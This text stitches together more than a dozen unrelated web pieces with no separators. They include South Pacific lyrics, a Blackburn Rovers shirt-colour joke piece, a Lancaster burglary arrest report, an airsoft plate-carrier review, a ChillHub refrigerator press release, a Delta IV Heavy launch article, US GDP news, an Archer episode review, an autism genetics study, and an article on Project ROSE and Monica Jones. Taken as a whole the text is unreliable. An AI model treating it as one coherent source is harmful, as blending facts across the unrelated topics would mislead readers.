You've got to be taught to be afraid of people whose eyes are oddly made. And people whose skin is a different shade. You've got to be carefully taught.
You've got to be taught to hate and fear. You've got to be taught from year to year. It's got to be drummed in your dear little ear. You've got to be carefully taught.
You've got to be taught, before it's too late. Before you are six, or seven, or eight. To hate all the people your relatives hate. You've got to be carefully taught. You've got to be carefully taught.
Rogers & Hammerstein South Pacific
Ever since Blackburn Rovers were formed, there has been one never-ending disagreement splitting our fans. Which side of Rovers' shirt should be blue and which should be white?
The first known picture of Rovers was taken at their Alexandra Meadows home in 1878. This shows the team in halved shirts, but some of these players have their colours on different sides of their shirts. There has never been anything definitive written down in Rovers' 143-year history saying which side these colours should be placed on the shirt. This has led to inevitable arguments between our fans over many years.
Meanwhile two Blackburn Rovers fans have spent years pursuing each other through time and space, each one trying to outwit the other with their view over which side of the shirt colours should be placed. These two fans also paint their faces blue and white in half designs. One has his blue on the left side and white on the right of his face, the other has his colours in an opposite formation. Both claim they are right, each of them dismissing their rival as a charlatan and an imposter and not a true fan of our club.
This obsession has led to other fans following suit, turning on each other and questioning their rival's loyalty and commitment to supporting our club. There have often been cases of families and friends falling out over this issue, some ultimately taking their ball home with them. It has even led to couples throwing tantrums and sending their partners to the doghouse.
This issue is such a serious one, it bodes the question of our very identity. Are Blackburn Rovers the Blue and Whites, or are they the White and Blues? Perhaps one day peace will break out between our fans. Now you know why there were never any mirrors in the Ewood Park toilets. Some Rovers fans would find their reflections very offensive.
Fortunately for our protagonists, there is a mysterious creature which dwells at Ewood Park, some kind of goat, which diverts attention away from petty infighting. Over the years it has taken various forms and many names. Its latest is Ben. At least he can rest assured, knowing he has helped bring about a temporary truce between those who would still be battling over where the colours should be placed on the Rovers shirt.
Don't let us get started on what shade of blue it should be!
Police credited surveillance footage, fingerprints from a crime scene and solid police work in linking a Lancaster man to two burglaries earlier this month.
Noel C. Agosto-Acevedo, 32, of the 100 Block of Dauphin Street, was arrested May 22 by Lancaster police in the 100 block of East New Street on a bench warrant, according to a police press release. Officers quickly noted Agosto-Acevedo's resemblance to an unidentified man seen on multiple surveillance cameras in the scene of two home-invasion burglaries reported May 16, police said.
During one of the burglaries, in the 300 block of North Mulberry Street, the suspect was scared off when one of the residents woke up and saw him, police said.
Detectives recovered a fingerprint from the scene and used the witness' description of the suspect — who had been wearing all red clothing — to track the man's movements using footage from several security cameras in the area, according to the release.
A comparison of Agotsto-Acevedo's fingerprint to the print lifted from the burglary resulted in a match, police said.
Police were also investigating a second burglary a few blocks away on North Mulberry that was reported at approximately 9 a.m. May 16, about two hours after the first break-in, in which the victim reported several personal items were taken from their home overnight, according to the release.
After speaking with the victim of the second burglary, police determined several of the stolen items were used at nearby stores and surveillance footage was examined from even more cameras, police said.
Based on the footage, police identified Agosto-Acevedo as a suspect in the second burglary, the release states.
Aside from his prior bench warrant, Agosto-Acevedo was charged with two counts of burglary, four counts of access device fraud and a single count of theft by unlawful taking, police said.
Magisterial District Judge Bruce A. Roth ordered Agosto-Acevedo held on $100,000 bail at his arraignment Thursday. A preliminary hearing was scheduled in Agosto-Acevedo's case for June 12, court records state.
If you are looking for a branded and affordable plate carrier, look no more! Viper Elite Platform is here and thanks to Military 1st we're going to take a look at it in this review.
I want a plate carrier!
I know! If you are an airsoft player like me, I can completely understand the need to purchase a plate carrier. They look cool and provide plenty of real estate to attach all your favourite pouches.
I'm sure you know all the high-end brands like LBX, Tactical Tailor, Crye and tons more. They are great, but their prices are… well, let's say they might be a tad too much for airsoft. This is where Viper comes in. As a company, they offer a wide selection of quality products at a very affordable price. Viper Elite Platform costs a fraction of what other companies charge for their products.
The Carrier Itself
The Elite Platform is a plate carrier that allows you to wear medium or large size plates in the front and in the back. It comes with a cummerbund with extra built-in pouches on the sides that can either carry extra side plates or be used for carrying items. The cummerbund itself has plenty of MOLLE webbing which means that apart from adding pouches on the front, you can also put them on your sides. Great for adding extra ammo magazines or attach medic or utility pouches.
The front contains good size Velcro ID panel for your patches. The panel is also MOLLE compatible. Below you will find the main MOLLE panel which is secured by Velcro. Lifting it allows you to undo the cummerbund which is also secured with Velcro. The cummerbund itself is optional. You can completely remove it and wear the plate carrier without it.
The back part is completely covered with MOLLE and Velcro ID panel. Together they allow you to attach backpacks, or any other type of compatible pouches. Viper offers plenty of them, so I'd recommend going and have a look.
Front and back armour carriers are held together with a QR buckle, so taking it off is very fast.
Shoulder straps are fully customisable. They have built in cord-lock fasteners and as an extra, you get two bungee retainers to manage your extra MOLLE or secure the hydration line for example.
From the inside, you can find padded breathable lining which increases the comfort of the operator and makes sure you get enough ventilation on the body contact areas.
The whole plate carrier is built using Cordura 600D which is more than enough for airsoft use.
Let's Put This Thing On
The carrier comes in one size only. It does provide plenty of room for adjustment but it is definitely not small. Being a skinny guy as I am, I had to adjust all the buckles to the minimum. And it worked!
With plates installed, 9 full metal GBB magazines in the pouches and a GBB rifle attached, the carrier performed very well. The padded lining makes it very comfortable to wear. Shoulder pads are wide which helps with the weight distribution. In the end, even during prolonged periods of time it felt solid. I like having the plate carrier sticking tight to my body, so for it to be ideal, given my size, I'd need a little bit more adjustment to make it just a few centimetres smaller. Testing it with a size M person made it fit perfectly.
Obviously given that it's a plate carrier, I would not recommend using it without ones installed. Dummy SAPI plates cost the equivalent of 3 coffees in a coffee shop, so definitely order them for any plate carrier.
The great thing about how the carrier is built is that even a small person is not restricted in the movements in any way. My arms and shoulders had no issues and were not blocked by the front plate.
I definitely enjoyed the extra space for the pouches. Moving from a chest rig was surprisingly exciting. This is due to the fact that the upper part of the front carrier has more MOLLE webbing, which allowed me to place the PTT in a far more reachable place compared to my previous setup.
Summary
The Viper Elite Platform is a great product for the price. For around 60GBP (~85USD, ~80EUR) you get the whole carrier with a cummerbund and some extras (like the webbing management clips). It's full Cordura 600D and it comes in 4 different colours (V-Cam, Green, Coyote and Black) and plenty of webbing. It's comfortable and adjustable to many sizes. All in all a great investment for people looking to buy a plate carrier and don't want to break the bank.
You can get the Viper Elite Platform at Military 1st for £59.50 GBP.
San Francisco, CA – May 11, 2015 – FirstBuild, GE Appliances' new global co-creation community is set to showcase ChillHub, its community-generated smart refrigerator in the Ubuntu booth (Stand 545) at the second annual Internet of Things World conference at the Moscone Center on May 12 – 13, 2015.
ChillHub is a refrigerator with two USB ports and built-in Wi-Fi connectivity. In addition, ChillHub has an open-source iOS-compatible app that provides seamless integration with the refrigerator by giving a user access to sensor data and control of the refrigerator's components allowing for new interior accessories to be easily developed. This is a first-of-its-kind platform that enables the development of new hardware products that can operate inside a cooled space.
Ubuntu is the favored platform for developers of all kinds – particularly those innovating around the Internet of Things. Since the launch of ‘Snappy' Ubuntu Core – a transactionally-updated Ubuntu for clouds and devices – a host of manufacturers has begun to develop highly innovative solutions like ChillHub to demonstrate the commercial opportunities surrounding the Internet of Things.
Developed by FirstBuild community members, ChillHub is not only a refrigerator, but an open development platform designed for makers, hackers, tinkerers and developers. FirstBuild community members continue to collaborate on products and features to customize and create new uses for their refrigerators. ChillHub, an 18 cubic foot top freezer refrigerator, will retail for $999 and can be ordered through FirstBuild.com. Limited pre-orders will also be available at an early-bird price of $799. Take a look here.
‘Snappy' Ubuntu Core powers Firstbuild's ChillHub and is the smallest and most secure edition of Ubuntu, perfect for inventors, technologists and makers. Snappy Ubuntu Core is a combination of an open platform with an app store that works across a range of devices, from tiny embedded boards to high-end switches and routers, sparking a rush of creativity in the maker and entrepreneur communities.
FirstBuild.com is a physical and online community dedicated to designing, engineering and building the next generation of major appliances. It fosters co-creation among engineers, designers, makers and home enthusiasts around the globe, who can participate in the development of appliance breakthroughs to address current challenges, and ensure that it is bringing products to market that people actually want. Community members identify market needs, participate in product development, and watch via social media as ideas speed from mind to market in only a matter of months at the FirstBuild Microfactory in Louisville, Ky.
“ChillHub is the infrastructure to be able to connect devices inside your refrigerator to be visualized on your smartphone and the internet,” said Natarajan Venkatakrishnan, director of GE FirstBuild. “FirstBuild's approach to open innovation makes it possible for the online community to help us conceive and design products that people want, and speed them to market.”
“As visitors to IoT World will see, Snappy is an amazing platform for the new generation of cloud and device developers,” said Maarten Ectors, VP of IoT, Canonical. “With FirstBuild we're bringing one of the most innovative IoT projects to market, developed on Snappy Ubuntu Core. We're excited to see what the response to ChillHub will be and are looking forward to collaborating on future projects.”
ChillHub leverages the power of FirstBuild's Green Bean (a circuit board bridge that allows software developers direct control of the refrigerator and other appliances through a javascript-based software development kit that uses the Node.js platform) to allow makers to develop products and features they want, and share them with the FirstBuild community.
About FirstBuild
FirstBuild is a new model for designing, building and bringing home appliances to market. A partnership between GE Appliances and Local Motors, FirstBuild brings together an open community of industrial designers, engineers and other innovative minds to collaborate on new product designs that are rapidly brought to life at the FirstBuild Microfactory. For more information on how to get involved, visit www.FirstBuild.com.
About Ubuntu
‘Snappy' Ubuntu Core is a super-lean, transactionally updated version of Ubuntu, perfect for inventors, technologists and the active and growing Ubuntu developer community, for cloud container hosts and smart, connected devices. It powers drones, robots, network switches, mobile base stations, industrial gateways, IoT home hubs and now, with Firstbuild, premium fridge-freezers.
Jason Davis • November 26, 2014
United Launch Alliance Answers Burning Questions about Orion's Rocket
When NASA's Orion spacecraft begins its maiden voyage next week, you may notice something alarming at liftoff: The rocket carrying Orion sort of catches itself on fire.
Not to worry, says United Launch Alliance, the rocket's manufacturer. Orion's launch vehicle is a Delta IV Heavy, a mammoth, three-core rocket normally used to heave classified military satellites into space. Just before the Delta IV ignition sequence starts, valves open that control the flow of liquid hydrogen to the engines. Some of that hydrogen seeps out of the engine bells and lingers around the rocket. When the engines roar to life, the excess hydrogen ignites, creating a fireball that chars the booster cores. Occasionally, the insulation on the booster cores smolders as the rocket lifts off.
Please accept marketing-cookies to watch this video. United Launch Alliance Delta IV Heavy NROL-65 launch highlights A Delta IV Heavy launches the classified NROL-65 payload into space in 2013. Notice the ignition sequence at the one-minute mark, and how the fireball blackens the booster cores. A Delta IV Heavy launches the classified NROL-65 payload into space in 2013. Notice the ignition sequence at the one-minute mark, and how the fireball blackens the booster cores.
The rocket is insulated for protection against this effect, according to United Launch Alliance. There are also sparkler systems under the engine bells to burn off most of the hydrogen. The flare-up can be seen on single-core Delta IV flights as well, but with just one engine, the effect is less dramatic.
Since the Delta IV Heavy's first launch in 2004, there have been efforts to mitigate the booster charring. The rocket's last flight used a staggered engine start sequence to reduce the total amount of hydrogen buildup. The new sequence will be used again for Orion's launch.
United Launch Alliance / USAF / Joe Davila / Jason Davis Delta IV Heavy launches This collection of Delta IV Heavy launches shows the rocket's history from 2004 to 2013. The amount of charring from unburned hydrogen varies from launch to launch. This collection of Delta IV Heavy launches shows the rocket's history from 2004 to 2013. The amount of charring from unburned hydrogen varies from launch to launch.
United Launch Alliance answered some questions for The Planetary Society about the science and engineering behind their rocket's ignition sequence.
What causes the charring phenomenon?
The start sequence for the RS-68 main engines on the Delta IV booster must ensure that the pump speeds and combustion processes remain within limits. This complex task requires opening the main hydrogen valve at T-5 seconds, approximately two seconds prior to opening the main oxygen valve that begins the ignition process. This “hydrogen lead” start sequence results in unburned hydrogen exiting the engine prior to engine ignition. Since hydrogen is lighter than air, the hydrogen gas rises and drifts with the prevailing breeze. As the powerful RS-68 engines reach full thrust, the high speed engine exhaust flowing into the flame ducts creates a strong suction of surrounding air and hydrogen into the launch duct. As the air mixes with the hydrogen during this liftoff event, the hydrogen burns, creating heat that can also char the insulating materials on the launch vehicle.
Is the Launch Table equipped with "sparklers" (similar to the space shuttle) that burn off some of the hydrogen before ignition?
Yes, prior to the RS-68 ignition sequence at approximately T-14.5 seconds, the Radial Outward Firing Igniters (ROFIs, or “sparklers”) start. As the hydrogen begins flowing during the engine start sequence, the ROFIs ignite the hydrogen. The ROFIs perform a critical function—they ensure the hydrogen burns in a controlled manner. Without the ROFIs, the hydrogen could mix with air before it can burn. Once pre-mixed with air, the heat of engine exhaust could cause a detonation of the hydrogen and oxygen mixture, with potentially damaging results. The ROFIs prevent this.
It seems like since the first flight of the Delta IV Heavy, the effect has been mitigated (but it's still present). Have efforts been made to decrease the amount of flames and charring?
The effects of the burning hydrogen at liftoff occur on all Delta IV vehicles to some extent; even Delta IV Medium vehicles with a single RS-68 engine experience the effect. But the Delta IV Heavy with three RS-68 engines produces more free hydrogen and a more noticeable flame. Beginning with a Delta IV Heavy mission from Vandenberg Air Force Base in August 2013, the Delta IV Heavy implemented a Staggered Engine Start sequence to significantly reduce the burning hydrogen. Staggered Engine Start involves starting the Starboard RS-68 engine two seconds prior to the Core and Port engines. The earlier start of the Starboard engine allows its thrust to establish a strong air current down the launch duct that sucks the hydrogen from the other two engines down and away from the vehicle. As a result, the hydrogen burning for the Vandenberg Delta IV launch last year was comparable to a Delta IV Medium vehicle with only one RS-68 engine. The Orion spacecraft's Exploration Flight Test 1 mission will be the first to use Staggered Engine Start from Cape Canaveral Air Force Station, and we expect much reduced burning of hydrogen and charring of the vehicle, similar to the launch from Vandenberg.
What kind of protection measures around the engines and rocket base are in place to protect the vehicle from these effects?
In addition to the ROFIs and Staggered Engine Start sequence, the design of the insulation systems throughout the launch vehicle accommodates the heat generated during liftoff. The design of these systems incorporates the brief high heating experienced during liftoff, and material selection minimizes the potential for sustained burning following exposure to the liftoff environment.
Does this happen for other launch vehicles as well, or is it unique to the Delta IV family?
Like the space shuttle, the Delta IV uses liquid hydrogen for fuel, and the start sequence begins by flowing hydrogen prior to ignition. The “hydrogen lead” and the buoyancy of the released hydrogen create the conditions for burning of hydrogen near the launch vehicle at liftoff. Other launch vehicles use different fuels that do not produce the same effects. The Atlas V, for example, uses refined kerosene (RP-1) for the fuel in the first stage and does not experience the same phenomenon.
United Launch Alliance A fiery liftoff A Delta IV Heavy rocket launches from Vandenberg Air Force Base carrying the classified NROL-49 payload in 2011. A Delta IV Heavy rocket launches from Vandenberg Air Force Base carrying the classified NROL-49 payload in 2011.
The U.S. economy grew at its fastest rate in more than a decade between the months of July through September, according to government data released Tuesday morning, marking the latest sign that a once-sluggish recovery is now running at full speed.
The Commerce Department said gross domestic product growth hit an annualized rate of 5 percent in the third quarter, revised upward from the previous estimate of 3.9 percent. Not since 2003 has the economy expanded so quickly.
The better-than-expected GDP numbers helped push the Dow Jones Industrial Average above 18,000 for the first time, the latest in a series of record highs. The S&P 500 also edged up.
(The Washington Post)
Economists say the United States is showing signs of a virtuous cycle in which workers can find suitable jobs that pay well and allow them to spend money. A year of robust labor market growth has been helped by falling oil prices, which amounts to a de facto tax cut and saves consumers hundreds annually at the pump.
The latest third-quarter estimate rose “for all the right reasons, notably stronger domestic demand,” Diane Swonk, chief economist at Mesirow Financial, wrote in a blog post. The contribution of consumer spending was revised upward by 0.7 percent from the previous Commerce Department estimate, given last month. Business investment was revised upward by 0.2 percent.
“Indeed, depending on the outcome for the fourth quarter, growth for the year could now surpass 2.5 percent, which is much better than anyone expected just a month ago,” Swonk wrote.
At an annualized rate, consumer spending was up in the third quarter by 3.2 percent. That spending accounts for about two-thirds of the GDP. Though incomes have stagnated for years among the middle and lower classes, there were nascent signs of wage growth last month, and households have deleveraged bad debt that held them back in the wake of the financial crisis.
Consumer sentiment is at a post-recession high, and the nation has seen its best year of hiring in 15 years. The latest six months of expansion suggest that a surprisingly poor first quarter performance — when the GDP shrank 2.1 percent — was an anomaly, likely the result of miserable East Coast winter weather that kept consumers indoors.
For quarterly gross domestic product, which measures all goods and services produces, the U.S. government releases an initial estimate, and then two revisions. This was the second of those revisions.
Economists think the run of good news could spill into the fourth quarter, paving the way for the sharpest U.S. expansion since the recession.
The 5 percent growth follows a strong 4.6 percent expansion in the second quarter. GDP growth has hit 3.5 percent or higher in four of the last five quarters.
“We're not going to stay at 5 percent, but those last five quarters, it's a sign that we've worked through all the factors that have been dragging down the recovery,” said Gus Faucher, a senior economist at PCN Financial Services Group.
Economists say the U.S. economy appears to have enough momentum to weather slowdowns in Japan and China and lackluster growth in Europe. Oil prices, which were sliding this summer but began a freefall in November, will provide an even bigger boost in the fourth quarter, amounting to billions in savings for American consumers. PNC forecasts that annual GDP growth will end up at 2.3 percent in 2014 and then rise to 3.3 percent in 2015.
The nation's economy is also helped by the fact that state and local governments have weathered a period of austerity and are again contributing to expansion. State and local expenditures and investment were up 1.1 percent annually in the third quarter, following a 3.4 percent expansion in the second quarter.The federal government, too, after two years of tightening and sequestration, is again giving the economy a lift: Its spending was up 9.9 percent in the third quarter. Such figures can fluctuate heavily from quarter to quarter, but economists say the government is unlikely to be a drag over the next year.
Photo: Rena Pacheco-Theard/Prepify Bathroom lines at Silicon Valley events are one measure of diversity, like those shown here at last month's TechCrunch Disrupt
We know Silicon Valley has a diversity problem. According to the U.S. Equal Employment Opportunity Commission, women make up 30 percent of the Silicon Valley tech workforce; 47 percent of the tech workers are white, 41 percent Asian American, 6 percent Hispanic, and 3 percent black.
So lawsuits charging discrimination at Silicon Valley companies, given the underrepresentation of some groups, aren't unexpected. The surprise is when such charges come from well-represented groups. And that is what has happened in the past couple of weeks.
At the end of September, the U.S. Department of Labor filed a lawsuit against Palo Alto's dominant company, Palantir, accusing it of systematically discriminating against Asian job applicants, hiring far fewer than a general statistical analysis would suggest is reasonable. (The lawsuit referred to Asians, not Asian-Americans. However, that appears to be a matter of semantics.)
And last week, a former Yahoo employee filed a lawsuit against the company charging CEO Marissa Mayer of using the performance review system to discriminate against men by intentionally hiring and promoting women.
Palantir is not one of the companies that has made its diversity statistics public, but it has long spoken of a commitment to diversity.
Yahoo reported diversity numbers in 2014 and 2015; the proportion of women in the overall workforce held steady at 37 percent, while the company increased the number of women in tech from 15 percent in 2014 to 16 percent in 2015. In 2014, the company's Chief Development Officer, Jacqueline Reses (now at Square), wrote in a blog post that Yahoo is “committed to attracting, developing and retaining a diverse workforce.”
Are lawsuits like these a good thing, or are they going to stall efforts to move towards more diversity in Silicon Valley?
TV Reviews All of our TV reviews in one convenient place.
The episode that “House Call” reminds me of most is season two's “Stage Two,” which is without a doubt my favorite episode of Archer. That's really high praise—but this episode deserves it. “House Call” is an episode with a lot of moving parts, but the story is so well-crafted that it never feels like anything gets dropped or left behind. The arc between where the episode starts and where it ends is miles apart, emotionally, but the episode is just 22 minutes long—and the characters never leave Tunt Manor. Though this is the fourth episode of the season, it feels like the first that is making full use of Archer Vice's absurd reset of the show's premise.
Advertisement
None of this would be possible, though, without one odd truth: The antics of Sterling Archer have become peripheral to the show that bears his name. (And his mother's, to be fair.) He's still very funny, and he's a necessary conduit for the audience to care about the story. But Archer has changed in the past few seasons from a character who did absolutely insane things to a character that stirred cocktails while other people did crazy things. This season, Archer's idiotic tendencies have been down to the barest of minimums: He did play tonsil-hockey with Ramon, I guess, but it's hardly “rampageo” idiotic.
Meanwhile, Pam's the character who has turned into an agent of chaos—a reliable source of insanity. She's all id, especially when she's all coked up. Her character has been mostly elided by cocaine at this point—she has very few lines in this episode that aren't grunting noises or “more cocaine”—but if anything, what this episode indicates is how fundamental Pam has come to the story of these former ISIS agents. Because, weirdly, getting addicted to cocaine turns Pam into a character with a hell of a lot more agency. For the first few seasons of this show, she was the weird HR manager, always desperate for a little more attention, hoping that the crew of agents would like her, and occasionally bursting into tears over her ruined marzipan model of her farm. She always let it all hang out, but there was a certain insecurity there, too.
Archer Vice Pam, though, is a character who growls at people, steals from her employers, eats cocaine in public, bursts out of her rope bonds, and doesn't give a damn about anyone's approval or validation. It's insane, but it's also kind of beautiful. Her weight loss is clearly tied into that sense of empowerment, too—I don't love the idea that being skinnier makes you happier, but I don't love the idea that being addicted to cocaine makes you happier, either. But the fact is that Pam's character is fucking fierce as hell right now, and I am loving it.
Advertisement
She's so powerful, in fact, that the entirety of “House Call” is really about trying to get Pam under control—by either getting her clean or, um, killing her. Krieger introduces a third option, which is to put the mind-control chip into her brain so that she does what they want her to. But when faced with a tranq'd out Pam and a tranq'd out Cheryl, the gang chooses to implant Cheryl—because, loosely, they like Pam better this way. And also don't care if she dies. (But it's Krieger and Cyril! They don't care if anyone dies!)
Cheryl, too, is getting a little bit of love from the plot, after several seasons on the margins. ISIS derailing entirely elevates her from the quirky, kinky assistant to a quasi-landlady, and the last few episodes have transformed her from a whiny heiress to a whiny heiress with bankable talent. And now that Krieger's chip is in her, the stage fright has been programmed right out of her. And she wants six fried eggs and Carolina fries, stat, or there will be hell to pay. Cheryl (pardon me, Cherlene) is pretty damn fierce now, too.
It's smart for Adam Reed and the rest of the team on Archer to not only blow up the premise of their show, but also to do it in a way that directs story and growth at its least-served characters. As wonderful as Pam and Cheryl have become over the course of the last four seasons, they've also been stuck in the roles they've been given. Krieger is the other character that could use some attention, and he might get it this season as well. (His little conversations with Cyril in this episode sound like they could be the beginnings of a friendship for Krieger, which hasn't happened before, if I remember correctly.)
Advertisement
This shift in focus also frees up Archer, Lana, and Malory to have some other stories for once—including, in this episode, a conversation between Ron and Malory and another between Archer and Lana that both felt long overdue. Todd, when he comes back for the next episode, will probably have a more eloquent eulogy for his favorite character. For now, I'll say that though I'm sad Malory and Ron broke up, I'm glad the show decided to do something with the characters. Both of them had fallen into kind of rut, and there are only so many ways to make the same joke about Malory's alcoholism. I actually felt bad for her when Ron walked (hobbled) away, and that's a rare feat.
The same is true of Lana and Archer, who have been stuck in a weird intermediate space between “openly into each other” and “frenemies” for several seasons now. I love them together—and not just because I have a craven ‘shipper's heart! When they're engaging with each other in this flirty but confrontational way, Lana's character has a reason to exist and Archer's character has a reason to grow. Archer could never truly mature—it would be so boring!—but over the past four seasons, he really has grown up a little, into a guy who researches and then memorizes all possible complications of pregnancy because he's worried about his ex-girlfriend. It's, you know, super weird, but also kind of adorable. Also: The sheer range of emotions that Lana and Archer take us through while they're locked in the kitchen is astonishing. Because Archer is all about the polished jokes, often any particular moment will feel a little like a foregone conclusion. The characters don't really emote with their faces, either, because they're animated, so it usually doesn't matter. But somehow, in that moment, H. Jon Benjamin and Aisha Tyler made the connection between those two characters feel very present and very alive. The transitions between affection, irritation, anger, and despair all work pretty well. And it ends with the words “rim job,” so, you know, no argument here.
Lastly, Gary Cole as FBI Agent Hawley reprises his role, and though he doesn't really interact with anyone too much (except for yelling through doors), he's kind of perfect in the role. This is just a solid episode all around.
Advertisement
Stray observations:
There's no way I'm going to be able to get every joke. So I will not even try. Leave ‘em in the comments.
Okay, just one: “It's… somewhat like that old gypsy woman said!”
There were a lot of running gags this week, too: The “Ripley” joke that kept failing; the death of “phrasing”; the metric system; all these ISIS people making noise while Ron's trying to convalesce.
Woodhouse found his way out of the pool somehow. He would like to inform you, however, that breakfast will be four minutes late.
The next Archer episode, “Southbound And Down,” will be on February 24. Even ISIS cannot conquer the winter Olympics.
Mary Cybulski / Paramount Pictures / AP Leonardo DiCaprio as Jordan Belfort in a scene from The Wolf of Wall Street
Martin Scorsese's The Wolf of Wall Street has set the all-time record for most f-bombs dropped in a R-rated film. The f-word is uttered 506 times in the movie, Variety reports.
Think that's too many f#$*s? Then you should stay away from Jordan Belfort's memoir upon which the movie is based. Belfort uses the f-word 737 times in his book.
Scorsese is no stranger to cussing. Some of the director's previous films also fall on the short-list for most f-bombs: Casino has 422, and Goodfellas has 300. But until this year, Spike Lee topped Scorsese, holding the record for most f-bombs in a film with 435 instances in Summer of Sam.
It's no surprise Wolf set a new record since the movie is all about excess: excessive hookers, excessive drug use and, of course, excessive swearing. (It's also excessively long, clocking in at three hours.)
Now we're just wondering whether it also won the title for most uses of Quaaludes in a single film.
[Variety]
A new approach to investigating hard-to-find chromosomal abnormalities has identified 33 genes associated with autism and related disorders, 22 for the first time. Several of these genes also appear to be altered in different ways in individuals with psychiatric disorders such as schizophrenia, symptoms of which may begin in adolescence or adulthood. Results of the study by a multi-institutional research team will appear in the April 27 issue of Cell and have been released online.
"By sequencing the genomes of a group of children with neurodevelopmental abnormalities, including autism, who were also known to have abnormal chromosomes, we identified the precise points where the DNA strands are disrupted and segments exchanged within or between chromosomes. As a result, we were able to discover a series of genes that have a strong individual impact on these disorders," says James Gusella, PhD, director of the Massachusetts General Hospital Center for Human Genetic Research (MGH CHGR) and senior author of the Cell paper. "We also found that many of these genes play a role in diverse clinical situations -- from severe intellectual disability to adult-onset schizophrenia -- leading to the conclusion that these genes are very sensitive to even subtle perturbations."
Physicians evaluating children with neurodevelopmental abnormalities often order tests to examine their chromosomes, but while these tests can detect significant abnormalities in chromosomal structure, they typically cannot identify a specific gene as being disrupted. Structural variants known as balanced chromosome abnormalities (BCAs) -- in which DNA segments are moved into different locations in the same chromosome or exchanged with segments in other chromosomes, leaving the overall size of the chromosomes unchanged -- are known to be significantly more common in individuals with autism spectrum disorders than in a control population. Several years ago Gusella and Cynthia Morton, PhD, of Brigham and Women's Hospital initiated the Developmental Genome Anatomy Project to identify developmentally important genes by investigating BCAs, but the task of identifying specific chromosome breakpoints has been slow and laborious.
To get a clearer view of the potential impact of BCAs on autism, the research team took advantage of a new approach developed by Michael Talkowski, PhD, of the MGH CHGR, lead author of the Cell paper, which allows the sequencing of an individual's entire genome in a way that detects the breakpoints of BCAs. The whole procedure can be accomplished in less than two weeks rather than the many months previously required. Screening the genomes of 38 individuals diagnosed with autism or other neurodevelopmental disorders found chromosomal breakpoints and rearrangements in non-protein-coding regions that disrupted 33 genes, only 11 of which previously had been suspected in these disorders.
As they compiled their results, the researchers were struck by how many of the BCA-disrupted genes they identified had been associated with psychiatric disorders in previous studies. To test their observation, they examined data from the largest genome-wide association study in schizophrenia to date -- in collaboration with Mark Daly, PhD, also of the MGH CHGR who led that study -- and found that a significant number of the BCA-disrupted genes identified in the current study were associated with schizophrenia when altered by more subtle variants that are common in the population.
"The theory that schizophrenia is a neurodevelopmental disorder has long been hypothesized, but we are just now beginning to uncover specific portions of the genetic underpinnings that may support that theory," says Talkowski. "We also found that different gene variations -- deletion, duplication or inactivation -- can result in very similar effects, while two similar changes at the same site might have very different neurodevelopmental manifestations. We suspected that the genetic causes of autism and other neurodevelopmental abnormalities are complex and likely to involve many genes, and our data support this."
Adds Gusella, who is the Bullard Professor of Neurogenetics at Harvard Medical School, "Our results suggest that many genes and pathways are important to normal brain development and that perturbation of some can lead to a great variety of developmental or psychiatric conditions, warranting extensive further study. We're hoping to investigate how these gene disruptions alter other genes and pathways and how prevalent these rearrangements are in the general population. This is a first step in what will be a long journey toward understanding genes underlying the pathophysiology of neurodevelopmental and psychiatric disorders and developing new clinical treatments."
Researchers from 15 institutions in three countries -- including Massachusetts General Hospital, the Broad Institute, Brigham and Women's Hospital and Harvard Medical School -- collaborated with Talkowski, Gusella, Morton and Daly on the investigation. Support for the study includes grants from the National Institutes of Health, the Simons Foundation Autism Research Initiative and Autism Speaks.
Amputee, 5, is already a world beater on her bionic blades
He has been called the fastest man on no legs. But Oscar 'Blade Runner' Pistorius got a run for his money when five-year-old Ellie Challis challenged him to a race on their bionic feet.
Paralympian Pistorius, world record holder for double amputees at 100, 200 and 400 metres, may have made some allowance for age and the fact that Ellie's blades were fitted only last month.
But she had clearly learned quicker than he bargained for - Ellie crossed the line first in all four of their 15-metre races.
Big feat: Ellie Challis gives Oscar Pitorius a run for his money in London
The youngster, from Little Clacton, Essex, lost her hands and lower legs after contracting meningitis at 16 months.
She was fitted with conventional prosthetic legs but found them painful so her parents Paul and Lisa contacted Dorset Orthopaedic who made her a junior version of the type of carbon-fibre blades used by 22-yearold Pistorius. Ellie is the youngest person to wear them and is making remarkable progress - as she proved against the South African paralympian.
Pistorius had both legs amputated below the knee at 11 months when doctors discovered he had no fibulas.
Raring to go: Ellie keeps an eye on her rival
He runs using Cheetah Flex-Foot limbs made by a company called Ossur.
Ellie's are the same brand but are more difficult to walk on because her legs were amputated above the knee.
Ellie was cheered on by her twin Sophie, sister Taila, nine, and brother Connor, 11, at a sports centre in Enfield, North London. Pistorius will compete in Manchester on Sunday at the Paralympic World Cup, sponsored by BT, for whom he acts as an ambassador.
Project ROSE is a program in the city of Phoenix, AZ that claims to help sex workers. In the name of rescuing them, police officers handcuff alleged sex workers and take them off the street and into a church to meet with prosecutors and Project ROSE representatives, who offer them “diversion programs.” Sex workers who aren't interested in the diversion programs face jail time. These sex workers aren't technically arrested, just made “contact” with; conveniently, if they're not arrested, then they don't need to be offered the chance to speak to a lawyer. In May of 2013, Monica Jones became one of the people arrested by Project ROSE; the charge was “manifesting prostitution” for accepting a ride home to her neighborhood from men who turned out to be undercover cops. This week, Jones was found guilty, and faces the possibility of serving time in a men's prison as a trans woman.
The ways in which Jones' identity as a black trans woman and sex workers' activist inform her arrest can't be ignored. Much like CeCe McDonald's arrest was impacted by racism and transmisogyny, Jones' arrest is impossible to separate from her race, gender, trans status, and public activism around sex work. TransAdvocate points out that trans women are already disproportionate recipients of police scrutiny, and trans status can intersect with racial profiling to make police interactions particularly fraught and dangerous. What research there is on the interactions between trans women of color and police tells us that police intimidation is a constant reality, even without a legitimate basis for arrest. If anything about the situation can be interpreted to relate to sex work, the odds are that much worse.
“We receive reports and work with survivors all the time who tell us they were profiled–generally these are transgender women–by the NYPD as sex workers, stopped because of profiling, and searched,” Sharon Stapel, [Anti-Violence Project]'s executive director, tells the Voice. “If a condom is found on them, that condom is taken as evidence as intent to engage in prostitution. Many survivors of violence tell us that makes them hesitant to carry condoms.”
The fact that Jones is in fact a sex work activist in her own community makes the narrative around her arrest that much more complicated, and more suspect. Jones isn't just an activist supporting the rights of sex workers, but is specifically an outspoken activist against Project ROSE, the same program under whose auspices she was arrested. In Jones' case, it's difficult to ignore the ways in which her arrest directly benefits the organization that arrested her. It's notable that she was randomly questioned on the street three times after her arrest; during her trial, Jones made a point of questioning the constitutionality of the program (which the ACLU also questions). As she told VICE:
“Because I was very outspoken about the diversion program, being out there protesting and also being a student of ASU School of Social Work, I feel like the police knew about me,” Monica said. “I was very loud, so they could pick me out of the crowd.”
